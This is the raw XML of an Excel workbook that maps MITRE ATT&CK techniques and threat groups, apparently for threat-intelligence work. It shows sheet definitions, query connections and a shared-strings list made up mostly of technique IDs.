
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="bin" ContentType="application/vnd.ms-office.activeX"/>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928"/>
  <workbookPr codeName="ThisWorkbook" defaultThemeVersion="124226"/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\PC\Downloads\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{578C113B-2F9E-4846-B773-E3AA9561BB31}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="10722" yWindow="1338" windowWidth="12174" windowHeight="11310" tabRatio="910" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Dashboard" sheetId="11" r:id="rId1"/>
    <sheet name="DropDown" sheetId="27" r:id="rId2"/>
    <sheet name="TTP" sheetId="24" r:id="rId3"/>
    <sheet name="techniques" sheetId="1" r:id="rId4"/>
    <sheet name="tactics" sheetId="2" r:id="rId5"/>
    <sheet name="software" sheetId="3" r:id="rId6"/>
    <sheet name="groups" sheetId="4" r:id="rId7"/>
    <sheet name="campaigns" sheetId="5" r:id="rId8"/>
    <sheet name="mitigations" sheetId="6" r:id="rId9"/>
    <sheet name="Enterprise ATT&amp;CK matrix" sheetId="7" r:id="rId10"/>
    <sheet name="relationships" sheetId="8" r:id="rId11"/>
    <sheet name="datasources" sheetId="9" r:id="rId12"/>
    <sheet name="citations" sheetId="10" r:id="rId1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32BA47-2F82-4CFF-ADF8-AC3247317765}" keepAlive="1" name="Query - G0007-enterprise-layer" description="Connection to the 'G0007-enterprise-layer' query in the workbook." type="5" refreshedVersion="0" background="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=G0007-enterprise-layer;Extended Properties=&quot;&quot;" command="SELECT * FROM [G0007-enterprise-layer]"/>
  </connection>
  <connection id="2" xr16:uid="{A82854F9-A223-472D-8879-04A85996A4AC}" keepAlive="1" name="Query - G0010-enterprise-layer" description="Connection to the 'G0010-enterprise-layer' query in the workbook." type="5" refreshedVersion="0" background="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=G0010-enterprise-layer;Extended Properties=&quot;&quot;" command="SELECT * FROM [G0010-enterprise-layer]"/>
  </connection>
  <connection id="3" xr16:uid="{644EE97D-B30E-4FA3-ACDF-0B3AF74A92A8}" keepAlive="1" name="Query - G0016-enterprise-layer" description="Connection to the 'G0016-enterprise-layer' query in the workbook." type="5" refreshedVersion="0" background="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=G0016-enterprise-layer;Extended Properties=&quot;&quot;" command="SELECT * FROM [G0016-enterprise-layer]"/>
  </connection>
  <connection id="4" xr16:uid="{34EB20C2-CAB9-47E0-90C1-BEE7D37DD0CC}" keepAlive="1" name="Query - G0034-enterprise-layer" description="Connection to the 'G0034-enterprise-layer' query in the workbook." type="5" refreshedVersion="0" background="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=G0034-enterprise-layer;Extended Properties=&quot;&quot;" command="SELECT * FROM [G0034-enterprise-layer]"/>
  </connection>
  <connection id="5" xr16:uid="{695901A9-2514-41C0-8D3E-2EE8BC292746}" keepAlive="1" name="Query - G0035-enterprise-layer" description="Connection to the 'G0035-enterprise-layer' query in the workbook." type="5" refreshedVersion="0" background="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=G0035-enterprise-layer;Extended Properties=&quot;&quot;" command="SELECT * FROM [G0035-enterprise-layer]"/>
  </connection>
  <connection id="6" xr16:uid="{E0951CD1-537B-4FD3-86B5-0B1075CEE9A4}" keepAlive="1" name="Query - G0047-enterprise-layer" description="Connection to the 'G0047-enterprise-layer' query in the workbook." type="5" refreshedVersion="0" background="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=G0047-enterprise-layer;Extended Properties=&quot;&quot;" command="SELECT * FROM [G0047-enterprise-layer]"/>
  </connection>
  <connection id="7" xr16:uid="{0E8E391A-EEFD-42C4-9D8D-4A00313806B4}" keepAlive="1" name="Query - G0088-enterprise-layer" description="Connection to the 'G0088-enterprise-layer' query in the workbook." type="5" refreshedVersion="0" background="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=G0088-enterprise-layer;Extended Properties=&quot;&quot;" command="SELECT * FROM [G0088-enterprise-layer]"/>
  </connection>
  <connection id="8" xr16:uid="{2F5795E8-4CC0-4DFD-99C7-BF200F1EDF67}" keepAlive="1" name="Query - G0102-enterprise-layer" description="Connection to the 'G0102-enterprise-layer' query in the workbook." type="5" refreshedVersion="0" background="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=G0102-enterprise-layer;Extended Properties=&quot;&quot;" command="SELECT * FROM [G0102-enterprise-layer]"/>
  </connection>
  <connection id="9" xr16:uid="{0955A862-3845-49CF-8DE8-08F5BC02533E}" keepAlive="1" name="Query - G0119-enterprise-layer" description="Connection to the 'G0119-enterprise-layer' query in the workbook." type="5" refreshedVersion="8" background="1" saveData="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=G0119-enterprise-layer;Extended Properties=&quot;&quot;" command="SELECT * FROM [G0119-enterprise-layer]"/>
  </connection>
  <connection id="10" xr16:uid="{4F4A9AB9-7C2B-4E78-9662-909CFD819B12}" keepAlive="1" name="Query - G0133-enterprise-layer" description="Connection to the 'G0133-enterprise-layer' query in the workbook." type="5" refreshedVersion="0" background="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=G0133-enterprise-layer;Extended Properties=&quot;&quot;" command="SELECT * FROM [G0133-enterprise-layer]"/>
  </connection>
  <connection id="11" xr16:uid="{6A2B486D-C721-44A8-ADA9-E6D916078350}" keepAlive="1" name="Query - G1003-enterprise-layer" description="Connection to the 'G1003-enterprise-layer' query in the workbook." type="5" refreshedVersion="0" background="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=G1003-enterprise-layer;Extended Properties=&quot;&quot;" command="SELECT * FROM [G1003-enterprise-layer]"/>
  </connection>
</connections>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="151663" uniqueCount="33570">
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>name</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>url</t>
  </si>
  <si>
    <t>created</t>
  </si>
  <si>
    <t>last modified</t>
  </si>
  <si>
    <t>version</t>
  </si>
  <si>
    <t>tactics</t>
  </si>
  <si>
    <t>detection</t>
  </si>
  <si>
    <t>platforms</t>
  </si>
  <si>
    <t>data sources</t>
  </si>
  <si>
    <t>is sub-technique</t>
  </si>
  <si>
    <t>sub-technique of</t>
  </si>
  <si>
    <t>defenses bypassed</t>
  </si>
  <si>
    <t>contributors</t>
  </si>
  <si>
    <t>permissions required</t>
  </si>
  <si>
    <t>supports remote</t>
  </si>
  <si>
    <t>system requirements</t>
  </si>
  <si>
    <t>CAPEC ID</t>
  </si>
  <si>
    <t>impact type</t>
  </si>
  <si>
    <t>effective permissions</t>
  </si>
  <si>
    <t>relationship citations</t>
  </si>
  <si>
    <t>T1548</t>
  </si>
  <si>
    <t>T1548.002</t>
  </si>
  <si>
    <t>T1548.004</t>
  </si>
  <si>
    <t>T1548.001</t>
  </si>
  <si>
    <t>T1548.003</t>
  </si>
  <si>
    <t>T1134</t>
  </si>
  <si>
    <t>T1134.002</t>
  </si>
  <si>
    <t>T1134.003</t>
  </si>
  <si>
    <t>T1134.004</t>
  </si>
  <si>
    <t>T1134.005</t>
  </si>
  <si>
    <t>T1134.001</t>
  </si>
  <si>
    <t>T1531</t>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>T1087.004</t>
  </si>
  <si>
    <t>T1087.002</t>
  </si>
  <si>
    <t>T1087.003</t>
  </si>
  <si>
    <t>T1087.001</t>
  </si>
  <si>
    <t>T1098</t>
  </si>
  <si>
    <t>T1098.001</t>
  </si>
  <si>
    <t>T1098.003</t>
  </si>
  <si>
    <t>T1098.002</t>
  </si>
  <si>
    <t>T1098.005</t>
  </si>
  <si>
    <t>T1098.004</t>
  </si>
  <si>
    <t>T1583</t>
  </si>
  <si>
    <t>T1583.005</t>
  </si>
  <si>
    <t>T1583.002</t>
  </si>
  <si>
    <t>T1583.001</t>
  </si>
  <si>
    <t>T1583.004</t>
  </si>
  <si>
    <t>T1583.007</t>
  </si>
  <si>
    <t>T1583.003</t>
  </si>
  <si>
    <t>T1583.006</t>
  </si>
  <si>
    <t>T1595</t>
  </si>
  <si>
    <t>T1595.001</t>
  </si>
  <si>
    <t>T1595.002</t>
  </si>
  <si>
    <t>T1595.003</t>
  </si>
  <si>
    <t>T1557</t>
  </si>
  <si>
    <t>T1557.002</t>
  </si>
  <si>
    <t>T1557.003</t>
  </si>
  <si>
    <t>T1557.001</t>
  </si>
  <si>
    <t>T1071</t>
  </si>
  <si>
    <t>T1071.004</t>
  </si>
  <si>
    <t>T1071.002</t>
  </si>
  <si>
    <t>T1071.003</t>
  </si>
  <si>
    <t>T1071.001</t>
  </si>
  <si>
    <t>T1010</t>
  </si>
  <si>
    <t>T1560</t>
  </si>
  <si>
    <t>T1560.003</t>
  </si>
  <si>
    <t>T1560.002</t>
  </si>
  <si>
    <t>T1560.001</t>
  </si>
  <si>
    <t>T1123</t>
  </si>
  <si>
    <t>T1119</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>T1020.001</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>T1547</t>
  </si>
  <si>
    <t>T1547.014</t>
  </si>
  <si>
    <t>T1547.002</t>
  </si>
  <si>
    <t>T1547.006</t>
  </si>
  <si>
    <t>T1547.008</t>
  </si>
  <si>
    <t>T1547.015</t>
  </si>
  <si>
    <t>T1547.010</t>
  </si>
  <si>
    <t>T1547.012</t>
  </si>
  <si>
    <t>T1547.007</t>
  </si>
  <si>
    <t>T1547.001</t>
  </si>
  <si>
    <t>T1547.005</t>
  </si>
  <si>
    <t>T1547.009</t>
  </si>
  <si>
    <t>T1547.003</t>
  </si>
  <si>
    <t>T1547.004</t>
  </si>
  <si>
    <t>T1547.013</t>
  </si>
  <si>
    <t>T1037</t>
  </si>
  <si>
    <t>T1037.002</t>
  </si>
  <si>
    <t>T1037.001</t>
  </si>
  <si>
    <t>T1037.003</t>
  </si>
  <si>
    <t>T1037.004</t>
  </si>
  <si>
    <t>T1037.005</t>
  </si>
  <si>
    <t>T1217</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t>T1185</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>T1110.004</t>
  </si>
  <si>
    <t>T1110.002</t>
  </si>
  <si>
    <t>T1110.001</t>
  </si>
  <si>
    <t>T1110.003</t>
  </si>
  <si>
    <t>T1612</t>
  </si>
  <si>
    <t>T1115</t>
  </si>
  <si>
    <t>T1580</t>
  </si>
  <si>
    <t>T1538</t>
  </si>
  <si>
    <t>T1526</t>
  </si>
  <si>
    <t>T1619</t>
  </si>
  <si>
    <t>T1059</t>
  </si>
  <si>
    <t>T1059.002</t>
  </si>
  <si>
    <t>T1059.007</t>
  </si>
  <si>
    <t>T1059.008</t>
  </si>
  <si>
    <t>T1059.001</t>
  </si>
  <si>
    <t>T1059.006</t>
  </si>
  <si>
    <t>T1059.004</t>
  </si>
  <si>
    <t>T1059.005</t>
  </si>
  <si>
    <t>T1059.003</t>
  </si>
  <si>
    <t>T1092</t>
  </si>
  <si>
    <t>T1586</t>
  </si>
  <si>
    <t>T1586.003</t>
  </si>
  <si>
    <t>T1586.002</t>
  </si>
  <si>
    <t>T1586.001</t>
  </si>
  <si>
    <t>T1554</t>
  </si>
  <si>
    <t>T1584</t>
  </si>
  <si>
    <t>T1584.005</t>
  </si>
  <si>
    <t>T1584.002</t>
  </si>
  <si>
    <t>T1584.001</t>
  </si>
  <si>
    <t>T1584.004</t>
  </si>
  <si>
    <t>T1584.007</t>
  </si>
  <si>
    <t>T1584.003</t>
  </si>
  <si>
    <t>T1584.006</t>
  </si>
  <si>
    <t>T1609</t>
  </si>
  <si>
    <t>T1613</t>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <t>T1136.003</t>
  </si>
  <si>
    <t>T1136.002</t>
  </si>
  <si>
    <t>T1136.001</t>
  </si>
  <si>
    <t>T1543</t>
  </si>
  <si>
    <t>T1543.001</t>
  </si>
  <si>
    <t>T1543.004</t>
  </si>
  <si>
    <t>T1543.002</t>
  </si>
  <si>
    <t>T1543.003</t>
  </si>
  <si>
    <t>T1555</t>
  </si>
  <si>
    <t>T1555.003</t>
  </si>
  <si>
    <t>T1555.001</t>
  </si>
  <si>
    <t>T1555.005</t>
  </si>
  <si>
    <t>T1555.002</t>
  </si>
  <si>
    <t>T1555.004</t>
  </si>
  <si>
    <t>T1485</t>
  </si>
  <si>
    <t>T1132</t>
  </si>
  <si>
    <t>T1132.002</t>
  </si>
  <si>
    <t>T1132.001</t>
  </si>
  <si>
    <t>T1486</t>
  </si>
  <si>
    <t>T1565</t>
  </si>
  <si>
    <t>T1565.003</t>
  </si>
  <si>
    <t>T1565.001</t>
  </si>
  <si>
    <t>T1565.002</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>T1001.001</t>
  </si>
  <si>
    <t>T1001.003</t>
  </si>
  <si>
    <t>T1001.002</t>
  </si>
  <si>
    <t>T1074</t>
  </si>
  <si>
    <t>T1074.001</t>
  </si>
  <si>
    <t>T1074.002</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>T1530</t>
  </si>
  <si>
    <t>T1602</t>
  </si>
  <si>
    <t>T1602.002</t>
  </si>
  <si>
    <t>T1602.001</t>
  </si>
  <si>
    <t>T1213</t>
  </si>
  <si>
    <t>T1213.003</t>
  </si>
  <si>
    <t>T1213.001</t>
  </si>
  <si>
    <t>T1213.002</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>T1025</t>
  </si>
  <si>
    <t>T1622</t>
  </si>
  <si>
    <t>T1491</t>
  </si>
  <si>
    <t>T1491.002</t>
  </si>
  <si>
    <t>T1491.001</t>
  </si>
  <si>
    <t>T1140</t>
  </si>
  <si>
    <t>T1610</t>
  </si>
  <si>
    <t>T1587</t>
  </si>
  <si>
    <t>T1587.002</t>
  </si>
  <si>
    <t>T1587.003</t>
  </si>
  <si>
    <t>T1587.004</t>
  </si>
  <si>
    <t>T1587.001</t>
  </si>
  <si>
    <t>T1006</t>
  </si>
  <si>
    <t>T1561</t>
  </si>
  <si>
    <t>T1561.001</t>
  </si>
  <si>
    <t>T1561.002</t>
  </si>
  <si>
    <t>T1484</t>
  </si>
  <si>
    <t>T1484.002</t>
  </si>
  <si>
    <t>T1484.001</t>
  </si>
  <si>
    <t>T1482</t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t>T1568</t>
  </si>
  <si>
    <t>T1568.003</t>
  </si>
  <si>
    <t>T1568.002</t>
  </si>
  <si>
    <t>T1568.001</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>T1114.003</t>
  </si>
  <si>
    <t>T1114.001</t>
  </si>
  <si>
    <t>T1114.002</t>
  </si>
  <si>
    <t>T1573</t>
  </si>
  <si>
    <t>T1573.002</t>
  </si>
  <si>
    <t>T1573.001</t>
  </si>
  <si>
    <t>T1499</t>
  </si>
  <si>
    <t>T1499.003</t>
  </si>
  <si>
    <t>T1499.004</t>
  </si>
  <si>
    <t>T1499.001</t>
  </si>
  <si>
    <t>T1499.002</t>
  </si>
  <si>
    <t>T1611</t>
  </si>
  <si>
    <t>T1585</t>
  </si>
  <si>
    <t>T1585.003</t>
  </si>
  <si>
    <t>T1585.002</t>
  </si>
  <si>
    <t>T1585.001</t>
  </si>
  <si>
    <t>T1546</t>
  </si>
  <si>
    <t>T1546.008</t>
  </si>
  <si>
    <t>T1546.009</t>
  </si>
  <si>
    <t>T1546.010</t>
  </si>
  <si>
    <t>T1546.011</t>
  </si>
  <si>
    <t>T1546.001</t>
  </si>
  <si>
    <t>T1546.015</t>
  </si>
  <si>
    <t>T1546.014</t>
  </si>
  <si>
    <t>T1546.012</t>
  </si>
  <si>
    <t>T1546.016</t>
  </si>
  <si>
    <t>T1546.006</t>
  </si>
  <si>
    <t>T1546.007</t>
  </si>
  <si>
    <t>T1546.013</t>
  </si>
  <si>
    <t>T1546.002</t>
  </si>
  <si>
    <t>T1546.005</t>
  </si>
  <si>
    <t>T1546.004</t>
  </si>
  <si>
    <t>T1546.003</t>
  </si>
  <si>
    <t>T1480</t>
  </si>
  <si>
    <t>T1480.001</t>
  </si>
  <si>
    <t>T1048</t>
  </si>
  <si>
    <t>T1048.002</t>
  </si>
  <si>
    <t>T1048.001</t>
  </si>
  <si>
    <t>T1048.003</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>T1011</t>
  </si>
  <si>
    <t>T1011.001</t>
  </si>
  <si>
    <t>T1052</t>
  </si>
  <si>
    <t>T1052.001</t>
  </si>
  <si>
    <t>T1567</t>
  </si>
  <si>
    <t>T1567.002</t>
  </si>
  <si>
    <t>T1567.001</t>
  </si>
  <si>
    <t>T1190</t>
  </si>
  <si>
    <t>T1203</t>
  </si>
  <si>
    <t>T1212</t>
  </si>
  <si>
    <t>T1211</t>
  </si>
  <si>
    <t>T1068</t>
  </si>
  <si>
    <t>T1210</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>T1083</t>
  </si>
  <si>
    <t>T1222</t>
  </si>
  <si>
    <t>T1222.002</t>
  </si>
  <si>
    <t>T1222.001</t>
  </si>
  <si>
    <t>T1495</t>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <t>T1606</t>
  </si>
  <si>
    <t>T1606.002</t>
  </si>
  <si>
    <t>T1606.001</t>
  </si>
  <si>
    <t>T1592</t>
  </si>
  <si>
    <t>T1592.004</t>
  </si>
  <si>
    <t>T1592.003</t>
  </si>
  <si>
    <t>T1592.001</t>
  </si>
  <si>
    <t>T1592.002</t>
  </si>
  <si>
    <t>T1589</t>
  </si>
  <si>
    <t>T1589.001</t>
  </si>
  <si>
    <t>T1589.002</t>
  </si>
  <si>
    <t>T1589.003</t>
  </si>
  <si>
    <t>T1590</t>
  </si>
  <si>
    <t>T1590.002</t>
  </si>
  <si>
    <t>T1590.001</t>
  </si>
  <si>
    <t>T1590.005</t>
  </si>
  <si>
    <t>T1590.006</t>
  </si>
  <si>
    <t>T1590.004</t>
  </si>
  <si>
    <t>T1590.003</t>
  </si>
  <si>
    <t>T1591</t>
  </si>
  <si>
    <t>T1591.002</t>
  </si>
  <si>
    <t>T1591.001</t>
  </si>
  <si>
    <t>T1591.003</t>
  </si>
  <si>
    <t>T1591.004</t>
  </si>
  <si>
    <t>T1615</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <t>T1564</t>
  </si>
  <si>
    <t>T1564.008</t>
  </si>
  <si>
    <t>T1564.005</t>
  </si>
  <si>
    <t>T1564.001</t>
  </si>
  <si>
    <t>T1564.002</t>
  </si>
  <si>
    <t>T1564.003</t>
  </si>
  <si>
    <t>T1564.004</t>
  </si>
  <si>
    <t>T1564.010</t>
  </si>
  <si>
    <t>T1564.009</t>
  </si>
  <si>
    <t>T1564.006</t>
  </si>
  <si>
    <t>T1564.007</t>
  </si>
  <si>
    <t>T1574</t>
  </si>
  <si>
    <t>T1574.012</t>
  </si>
  <si>
    <t>T1574.001</t>
  </si>
  <si>
    <t>T1574.002</t>
  </si>
  <si>
    <t>T1574.004</t>
  </si>
  <si>
    <t>T1574.006</t>
  </si>
  <si>
    <t>T1574.005</t>
  </si>
  <si>
    <t>T1574.013</t>
  </si>
  <si>
    <t>T1574.007</t>
  </si>
  <si>
    <t>T1574.008</t>
  </si>
  <si>
    <t>T1574.009</t>
  </si>
  <si>
    <t>T1574.010</t>
  </si>
  <si>
    <t>T1574.011</t>
  </si>
  <si>
    <t>T1562</t>
  </si>
  <si>
    <t>T1562.008</t>
  </si>
  <si>
    <t>T1562.002</t>
  </si>
  <si>
    <t>T1562.007</t>
  </si>
  <si>
    <t>T1562.004</t>
  </si>
  <si>
    <t>T1562.001</t>
  </si>
  <si>
    <t>T1562.010</t>
  </si>
  <si>
    <t>T1562.003</t>
  </si>
  <si>
    <t>T1562.006</t>
  </si>
  <si>
    <t>T1562.009</t>
  </si>
  <si>
    <t>T1525</t>
  </si>
  <si>
    <t>T1070</t>
  </si>
  <si>
    <t>T1070.003</t>
  </si>
  <si>
    <t>T1070.002</t>
  </si>
  <si>
    <t>T1070.008</t>
  </si>
  <si>
    <t>T1070.007</t>
  </si>
  <si>
    <t>T1070.009</t>
  </si>
  <si>
    <t>T1070.001</t>
  </si>
  <si>
    <t>T1070.004</t>
  </si>
  <si>
    <t>T1070.005</t>
  </si>
  <si>
    <t>T1070.006</t>
  </si>
  <si>
    <t>T1202</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>T1490</t>
  </si>
  <si>
    <t>T1056</t>
  </si>
  <si>
    <t>T1056.004</t>
  </si>
  <si>
    <t>T1056.002</t>
  </si>
  <si>
    <t>T1056.001</t>
  </si>
  <si>
    <t>T1056.003</t>
  </si>
  <si>
    <t>T1559</t>
  </si>
  <si>
    <t>T1559.001</t>
  </si>
  <si>
    <t>T1559.002</t>
  </si>
  <si>
    <t>T1559.003</t>
  </si>
  <si>
    <t>T1534</t>
  </si>
  <si>
    <t>T1570</t>
  </si>
  <si>
    <t>T1036</t>
  </si>
  <si>
    <t>T1036.007</t>
  </si>
  <si>
    <t>T1036.001</t>
  </si>
  <si>
    <t>T1036.004</t>
  </si>
  <si>
    <t>T1036.005</t>
  </si>
  <si>
    <t>T1036.003</t>
  </si>
  <si>
    <t>T1036.002</t>
  </si>
  <si>
    <t>T1036.006</t>
  </si>
  <si>
    <t>T1556</t>
  </si>
  <si>
    <t>T1556.001</t>
  </si>
  <si>
    <t>T1556.007</t>
  </si>
  <si>
    <t>T1556.006</t>
  </si>
  <si>
    <t>T1556.004</t>
  </si>
  <si>
    <t>T1556.002</t>
  </si>
  <si>
    <t>T1556.003</t>
  </si>
  <si>
    <t>T1556.005</t>
  </si>
  <si>
    <t>T1578</t>
  </si>
  <si>
    <t>T1578.002</t>
  </si>
  <si>
    <t>T1578.001</t>
  </si>
  <si>
    <t>T1578.003</t>
  </si>
  <si>
    <t>T1578.004</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>T1601</t>
  </si>
  <si>
    <t>T1601.002</t>
  </si>
  <si>
    <t>T1601.001</t>
  </si>
  <si>
    <t>T1111</t>
  </si>
  <si>
    <t>T1621</t>
  </si>
  <si>
    <t>T1104</t>
  </si>
  <si>
    <t>T1106</t>
  </si>
  <si>
    <t>T1599</t>
  </si>
  <si>
    <t>T1599.001</t>
  </si>
  <si>
    <t>T1498</t>
  </si>
  <si>
    <t>T1498.001</t>
  </si>
  <si>
    <t>T1498.002</t>
  </si>
  <si>
    <t>T1046</t>
  </si>
  <si>
    <t>T1135</t>
  </si>
  <si>
    <t>T1040</t>
  </si>
  <si>
    <t>T1095</t>
  </si>
  <si>
    <t>T1571</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>T1003.008</t>
  </si>
  <si>
    <t>T1003.005</t>
  </si>
  <si>
    <t>T1003.006</t>
  </si>
  <si>
    <t>T1003.004</t>
  </si>
  <si>
    <t>T1003.001</t>
  </si>
  <si>
    <t>T1003.003</t>
  </si>
  <si>
    <t>T1003.007</t>
  </si>
  <si>
    <t>T1003.002</t>
  </si>
  <si>
    <t>T1027</t>
  </si>
  <si>
    <t>T1027.001</t>
  </si>
  <si>
    <t>T1027.004</t>
  </si>
  <si>
    <t>T1027.007</t>
  </si>
  <si>
    <t>T1027.009</t>
  </si>
  <si>
    <t>T1027.006</t>
  </si>
  <si>
    <t>T1027.005</t>
  </si>
  <si>
    <t>T1027.002</t>
  </si>
  <si>
    <t>T1027.003</t>
  </si>
  <si>
    <t>T1027.008</t>
  </si>
  <si>
    <t>T1588</t>
  </si>
  <si>
    <t>T1588.003</t>
  </si>
  <si>
    <t>T1588.004</t>
  </si>
  <si>
    <t>T1588.005</t>
  </si>
  <si>
    <t>T1588.001</t>
  </si>
  <si>
    <t>T1588.002</t>
  </si>
  <si>
    <t>T1588.006</t>
  </si>
  <si>
    <t>T1137</t>
  </si>
  <si>
    <t>T1137.006</t>
  </si>
  <si>
    <t>T1137.001</t>
  </si>
  <si>
    <t>T1137.002</t>
  </si>
  <si>
    <t>T1137.003</t>
  </si>
  <si>
    <t>T1137.004</t>
  </si>
  <si>
    <t>T1137.005</t>
  </si>
  <si>
    <t>T1201</t>
  </si>
  <si>
    <t>T1120</t>
  </si>
  <si>
    <t>T1069</t>
  </si>
  <si>
    <t>T1069.003</t>
  </si>
  <si>
    <t>T1069.002</t>
  </si>
  <si>
    <t>T1069.001</t>
  </si>
  <si>
    <t>T1566</t>
  </si>
  <si>
    <t>T1598</t>
  </si>
  <si>
    <t>T1598.002</t>
  </si>
  <si>
    <t>T1598.003</t>
  </si>
  <si>
    <t>T1598.001</t>
  </si>
  <si>
    <t>T1566.001</t>
  </si>
  <si>
    <t>T1566.002</t>
  </si>
  <si>
    <t>T1566.003</t>
  </si>
  <si>
    <t>T1647</t>
  </si>
  <si>
    <t>T1542</t>
  </si>
  <si>
    <t>T1542.003</t>
  </si>
  <si>
    <t>T1542.002</t>
  </si>
  <si>
    <t>T1542.004</t>
  </si>
  <si>
    <t>T1542.001</t>
  </si>
  <si>
    <t>T1542.005</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>T1055</t>
  </si>
  <si>
    <t>T1055.004</t>
  </si>
  <si>
    <t>T1055.001</t>
  </si>
  <si>
    <t>T1055.011</t>
  </si>
  <si>
    <t>T1055.015</t>
  </si>
  <si>
    <t>T1055.002</t>
  </si>
  <si>
    <t>T1055.009</t>
  </si>
  <si>
    <t>T1055.013</t>
  </si>
  <si>
    <t>T1055.012</t>
  </si>
  <si>
    <t>T1055.008</t>
  </si>
  <si>
    <t>T1055.003</t>
  </si>
  <si>
    <t>T1055.005</t>
  </si>
  <si>
    <t>T1055.014</t>
  </si>
  <si>
    <t>T1572</t>
  </si>
  <si>
    <t>T1090</t>
  </si>
  <si>
    <t>T1090.004</t>
  </si>
  <si>
    <t>T1090.002</t>
  </si>
  <si>
    <t>T1090.001</t>
  </si>
  <si>
    <t>T1090.003</t>
  </si>
  <si>
    <t>T1012</t>
  </si>
  <si>
    <t>T1620</t>
  </si>
  <si>
    <t>T1219</t>
  </si>
  <si>
    <t>T1563</t>
  </si>
  <si>
    <t>T1563.002</t>
  </si>
  <si>
    <t>T1563.001</t>
  </si>
  <si>
    <t>T1021</t>
  </si>
  <si>
    <t>T1021.003</t>
  </si>
  <si>
    <t>T1021.001</t>
  </si>
  <si>
    <t>T1021.002</t>
  </si>
  <si>
    <t>T1021.004</t>
  </si>
  <si>
    <t>T1021.005</t>
  </si>
  <si>
    <t>T1021.006</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>T1091</t>
  </si>
  <si>
    <t>T1496</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t>T1014</t>
  </si>
  <si>
    <t>T1053</t>
  </si>
  <si>
    <t>T1053.002</t>
  </si>
  <si>
    <t>T1053.007</t>
  </si>
  <si>
    <t>T1053.003</t>
  </si>
  <si>
    <t>T1053.005</t>
  </si>
  <si>
    <t>T1053.006</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>T1113</t>
  </si>
  <si>
    <t>T1597</t>
  </si>
  <si>
    <t>T1597.002</t>
  </si>
  <si>
    <t>T1597.001</t>
  </si>
  <si>
    <t>T1596</t>
  </si>
  <si>
    <t>T1596.004</t>
  </si>
  <si>
    <t>T1596.001</t>
  </si>
  <si>
    <t>T1596.003</t>
  </si>
  <si>
    <t>T1596.005</t>
  </si>
  <si>
    <t>T1596.002</t>
  </si>
  <si>
    <t>T1593</t>
  </si>
  <si>
    <t>T1593.003</t>
  </si>
  <si>
    <t>T1593.002</t>
  </si>
  <si>
    <t>T1593.001</t>
  </si>
  <si>
    <t>T1594</t>
  </si>
  <si>
    <t>T1505</t>
  </si>
  <si>
    <t>T1505.004</t>
  </si>
  <si>
    <t>T1505.001</t>
  </si>
  <si>
    <t>T1505.005</t>
  </si>
  <si>
    <t>T1505.002</t>
  </si>
  <si>
    <t>T1505.003</t>
  </si>
  <si>
    <t>T1648</t>
  </si>
  <si>
    <t>T1489</t>
  </si>
  <si>
    <t>T1129</t>
  </si>
  <si>
    <t>T1072</t>
  </si>
  <si>
    <t>T1518</t>
  </si>
  <si>
    <t>T1518.001</t>
  </si>
  <si>
    <t>T1608</t>
  </si>
  <si>
